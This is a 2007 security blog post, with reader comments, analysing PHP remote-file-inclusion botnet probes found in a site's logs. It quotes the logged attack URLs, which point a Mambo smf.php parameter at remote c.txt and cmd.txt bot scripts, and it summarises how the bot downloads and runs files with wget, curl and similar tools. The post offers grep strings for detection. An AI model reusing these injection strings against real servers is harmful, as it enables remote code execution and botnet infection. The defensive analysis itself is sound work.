Botnets Spreading Via PHP Version all_most_happened_to_me
I know that botnets spreading by vulnerabilities in PHP is not new news. It is however the first time that I have noticed it on my site. So I have been targeted….along with the rest of the planet.
Actually this is the second time that I noticed this activity on my site. The first time I noticed something unusual was when I was checking the referring page of incoming connections. I noticed that one of the incoming connections pointed to a file named "c.txt" on another webserver. The actual link was: archives/category/components/com_smf/smf.php?mosConfig_absolute_path=http://www.depdiknas.go.id/c.txt?. I immediately knew that this was an attempt to subvert some code in the smf.php file so I searched my web server for this file. As the search did not come up with anything, and I was extremely busy at the time, I just drove on and didn't worry about it. Until today, that is, when I noticed the link again.
Twice was enough for me. I start looking into what was happening by following the links, downloading the text files and analyzing them in Notepad++ . During this research, however, I noticed that "B10[m|g]" the author of "Yet another non-informative, useless blog " had already done this for me in his The MUIE Botnet post. In fact, he went the extra step I would have avoided by connecting to the Botnet channel and confronting the Botnet "Masters" (as they probably want us to refer to them as). I think that B10[m|g] found a better name for them. Good work, B10[m|g] and thank you for disclosing this to the public. You are definitely going forth and doing good things.
Some of the things that I did find interesting that B10[m|g] didn't mention (probably because he is more use to seeing this type of behavior in botnet deployment programs).
- The "c.txt" file attempts to download, execute, and remove two other files. Not so unusual except for the fact that it does this with 29 different commands. To execute the commands it uses the following calls: system, passthru, popen, proc_open, and roc_open. Each one of these calls attempted to download the file with the following programs: "wget", "curl -O", lwp-download, "lynx -source", fetch, and GET.
- Some of the strings in the bot code stand out (you could grep for some of these terms to determine if you have this file on your system): "VulnScan v2", "Norman ownz your box", nasa.gov, "Shellbot RFI by Source v1.4", TCP DDoSing", "w0rmb0t ver", "Encontramos-una-ip" (which is Spanish for "Find-an-ip"), "MORGAN OWNED YOUR BOX", "Pagina-Vulnerable" (which is Spanish for "Page Vulnerable"), "tcpflooder", "udpflooder", "www.google.com.br/search?hl=pt-BR&q=", and (as B10[b|g] stated) "# NOTE: DONT REMOVE COPYRIGHTS".
What is the moral of this story? Well, first, in the Wild West of the Internet the administrators of any system and application must monitor their logs for anomalous activity. If they find something that appears to be out of the ordinary then it needs to be investigated to determine what is actually happening. Once the information about the activity has been gathered a risk analysis of the assets involved needs to be performed to determine if any additional actions are necessary. Some issues that should not be overlooked during this risk assessment include; if and how an infection happened, is there any sensitive information involved, and could other systems on the same network segment be affected as well. Then action needs to be taken to alleviate the problem and get the asset back up and running so that it can perform its function.
All of that said, I am glad that I am not vulnerable to exploitation via this avenue. I can only hope that continuing this behavior will help protect me in the future by allowing me to catch this type of malicious activity in the act.
UPDATE: Of course, as soon as I published this I noticed this in my logs: components/com_smf/smf.php?mosConfig_absolute_path=http://www.dariustech.com/templates/cmd.txt?&list=1&cmd=id
Go forth and do good things,
Cutaway
botnet, B10[m|g], smf.php, c.txt, PHP, Security Ripcord
Help support my training and travel to security conferences. Get your SANS Training and GIAC Certifications through the Security Ripcord.
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
January 12th, 2007 at 1:24 pm
Thanks for linking to my post (I found the referer to this site in my logs hehe). Anyways, your dariustech.com entry I did not get (yet). I’ve received some others and up to now I’ve been able to minimize their risk by complaining to the ISPs. Also I try to look up infected boxes in the IRC channels and warn the owners of those machines. That resulted (in this specific case) in currently only 1 infected machine in #muie (ok, multiple processes, but still but 1 machine). Woohoo.
As to confronting the “masters” … don’t sweat it. They are script kiddies, you can see it by the amateur approach. And hey, it’s to confront them
Will look into your dariustech.com entry too.
Remember, botnets are mainly responsible for spam, so stopping them is key!
January 12th, 2007 at 1:29 pm
Guess the dariustech host isn’t a big problem anymore:
$ HEAD ‘http://www.dariustech.com/templates/cmd.txt?&list=1&cmd=id’
404 Not Found
Connection: close
Date: Fri, 12 Jan 2007 13:28:08 GMT
Accept-Ranges: bytes
ETag: “1410009-3c0-cf48f280″
Server: Apache/2.0.52 (CentOS)
Content-Length: 960
Content-Type: text/html
Last-Modified: Tue, 22 Mar 2005 20:37:14 GMT
Client-Date: Fri, 12 Jan 2007 13:29:24 GMT
Client-Peer: 12.180.48.93:80
Client-Response-Num: 1
X-Pad: avoid browser bug
January 24th, 2007 at 1:29 am
Hey,
These little punks decided try to use my site for spam…thanks for reporting it to my ISP, it helped me quickly put a stop to them….
I found that it was a module from mambo that they were using to remotely upload this file, so I quickly deleted that module..
Again thanks,
DTI webmaster – http://www.dariustech.com
January 28th, 2007 at 6:48 am
[...] As I stated in a previous post, I have been paying a little more attention to the information provided in URI and Refer sections provided by one of my Wordpress plugins. This information has, at times, contained information about some systems on the Internet that are searching for other systems with vulnerable PHP installations and applications. As I mentioned in the original post I found a blog where another blogger had already analyzed the scripts that I found on a hacked server, which was scanning my web server. The blog is B10[m|g] and the blogger goes by the pseudonym B10m. [...]
January 29th, 2007 at 7:41 am
[...] Next I started to look into the file that it is pointing to for the code execution. Recently I have been plagued by some attacks whose intent was to run some simple download commands which, in turn, would start up a perl IRC bot. Imagine how surprised I was to be greeted with the contents of a file (”cmd.do”) which appears to be some type of HTML/PHP based IRC (?) bot. As I began to scan this file I began to like it even less. I am not a big-time PHP programmer but I could tell that this script was taking the input from the incoming URLs and creating directories and files, manipulating their paths based on OS type, uploading files, deleting files (such as dlls) and directories, creating Administrator accounts (holy crap), and running commands. This may or may not have been a cut and paste hack job but I very much do not like the implications of any of these actions. Even if everything is running as the user (non-root) who initiated the web server, I don’t like the implications of this in the least. [...]